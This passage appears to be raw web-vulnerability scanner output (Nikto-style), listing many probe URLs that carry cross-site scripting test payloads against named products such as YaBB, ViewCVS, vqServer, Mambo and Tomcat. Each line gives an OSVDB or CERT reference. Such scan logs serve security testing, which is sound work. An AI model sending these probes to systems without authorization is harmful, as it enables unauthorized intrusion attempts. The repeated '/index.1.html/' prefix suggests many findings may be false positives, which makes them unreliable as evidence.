627+ OSVDB-7497: /index.1.html/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
628+ OSVDB-7496: /index.1.html/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
629+ OSVDB-2820: /index.1.html/index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
630+ /index.1.html/https-admserv/bin/index?/<script>alert(document.cookie)</script>: Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
631+ /index.1.html/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>: NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
632+ /index.1.html/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
633+ /index.1.html/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
634+ /index.1.html/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
635+ /index.1.html/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>: Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html.
636+ /index.1.html/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>: The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. http://www.cert.org/advisories/CA-2000-02.html.
637+ /index.1.html/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script>: IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA-2000-02.html.
638+ OSVDB-17665: /index.1.html/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting
639+ OSVDB-17666: /index.1.html/_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting
640+ /index.1.html/nosuchurl/><script>alert('Vulnerable')</script>: JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
641+ OSVDB-3624: /index.1.html/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
642+ OSVDB-9234: /index.1.html/cgi.cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
643+ OSVDB-9234: /index.1.html/webcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
644+ OSVDB-9234: /index.1.html/cgi-914/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
645+ OSVDB-9234: /index.1.html/cgi-915/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
646+ OSVDB-9234: /index.1.html/bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
647+ OSVDB-9234: /index.1.html/cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
648+ OSVDB-9234: /index.1.html/mpcgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
649+ OSVDB-9234: /index.1.html/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
650+ OSVDB-9234: /index.1.html/ows-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
651+ OSVDB-9234: /index.1.html/cgi-sys/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
652+ OSVDB-9234: /index.1.html/cgi-local/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
653+ OSVDB-9234: /index.1.html/htbin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
654+ OSVDB-9234: /index.1.html/cgibin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
655+ OSVDB-9234: /index.1.html/cgis/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
656+ OSVDB-9234: /index.1.html/scripts/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
657+ OSVDB-9234: /index.1.html/cgi-win/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
658+ OSVDB-9234: /index.1.html/fcgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
659+ OSVDB-9234: /index.1.html/cgi-exe/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
660+ OSVDB-9234: /index.1.html/cgi-home/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
661+ OSVDB-9234: /index.1.html/cgi-perl/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
662+ OSVDB-9234: /index.1.html/scgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
663+ OSVDB-9234: /index.1.html/cgi-bin-sdb/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
664+ OSVDB-9234: /index.1.html/cgi-mod/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>: YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
665+ /index.1.html/cgi.cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
666+ /index.1.html/webcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
667+ /index.1.html/cgi-914/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
668+ /index.1.html/cgi-915/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
669+ /index.1.html/bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
670+ /index.1.html/cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
671+ /index.1.html/mpcgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
672+ /index.1.html/cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
673+ /index.1.html/ows-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
674+ /index.1.html/cgi-sys/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
675+ /index.1.html/cgi-local/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
676+ /index.1.html/htbin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
677+ /index.1.html/cgibin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
678+ /index.1.html/cgis/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
679+ /index.1.html/scripts/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
680+ /index.1.html/cgi-win/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
681+ /index.1.html/fcgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
682+ /index.1.html/cgi-exe/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
683+ /index.1.html/cgi-home/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
684+ /index.1.html/cgi-perl/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
685+ /index.1.html/scgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
686+ /index.1.html/cgi-bin-sdb/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
687+ /index.1.html/cgi-mod/vq/demos/respond.pl?<script>alert('Vulnerable')</script>: vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. http://www.cert.org/advisories/CA-2000-02.html.
688+ OSVDB-6458: /index.1.html/cgi.cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
689+ OSVDB-6458: /index.1.html/webcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
690+ OSVDB-6458: /index.1.html/cgi-914/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
691+ OSVDB-6458: /index.1.html/cgi-915/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
692+ OSVDB-6458: /index.1.html/bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
693+ OSVDB-6458: /index.1.html/cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
694+ OSVDB-6458: /index.1.html/mpcgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
695+ OSVDB-6458: /index.1.html/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
696+ OSVDB-6458: /index.1.html/ows-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
697+ OSVDB-6458: /index.1.html/cgi-sys/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
698+ OSVDB-6458: /index.1.html/cgi-local/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
699+ OSVDB-6458: /index.1.html/htbin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
700+ OSVDB-6458: /index.1.html/cgibin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
701+ OSVDB-6458: /index.1.html/cgis/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
702+ OSVDB-6458: /index.1.html/scripts/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
703+ OSVDB-6458: /index.1.html/cgi-win/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
704+ OSVDB-6458: /index.1.html/fcgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
705+ OSVDB-6458: /index.1.html/cgi-exe/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
706+ OSVDB-6458: /index.1.html/cgi-home/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
707+ OSVDB-6458: /index.1.html/cgi-perl/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
708+ OSVDB-6458: /index.1.html/scgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
709+ OSVDB-6458: /index.1.html/cgi-bin-sdb/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
710+ OSVDB-6458: /index.1.html/cgi-mod/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
711+ OSVDB-6458: /index.1.html/cgi.cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
712+ OSVDB-6458: /index.1.html/webcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
713+ OSVDB-6458: /index.1.html/cgi-914/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
714+ OSVDB-6458: /index.1.html/cgi-915/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
715+ OSVDB-6458: /index.1.html/bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
716+ OSVDB-6458: /index.1.html/cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
717+ OSVDB-6458: /index.1.html/mpcgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
718+ OSVDB-6458: /index.1.html/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
719+ OSVDB-6458: /index.1.html/ows-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
720+ OSVDB-6458: /index.1.html/cgi-sys/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
721+ OSVDB-6458: /index.1.html/cgi-local/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
722+ OSVDB-6458: /index.1.html/htbin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
723+ OSVDB-6458: /index.1.html/cgibin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
724+ OSVDB-6458: /index.1.html/cgis/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
725+ OSVDB-6458: /index.1.html/scripts/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
726+ OSVDB-6458: /index.1.html/cgi-win/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
727+ OSVDB-6458: /index.1.html/fcgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
728+ OSVDB-6458: /index.1.html/cgi-exe/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
729+ OSVDB-6458: /index.1.html/cgi-home/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
730+ OSVDB-6458: /index.1.html/cgi-perl/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
731+ OSVDB-6458: /index.1.html/scgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
732+ OSVDB-6458: /index.1.html/cgi-bin-sdb/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
733+ OSVDB-6458: /index.1.html/cgi-mod/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
734+ /index.1.html/cgi.cgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
735+ /index.1.html/webcgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
736+ /index.1.html/cgi-914/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
737+ /index.1.html/cgi-915/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
738+ /index.1.html/bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
739+ /index.1.html/cgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
740+ /index.1.html/mpcgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
741+ /index.1.html/cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
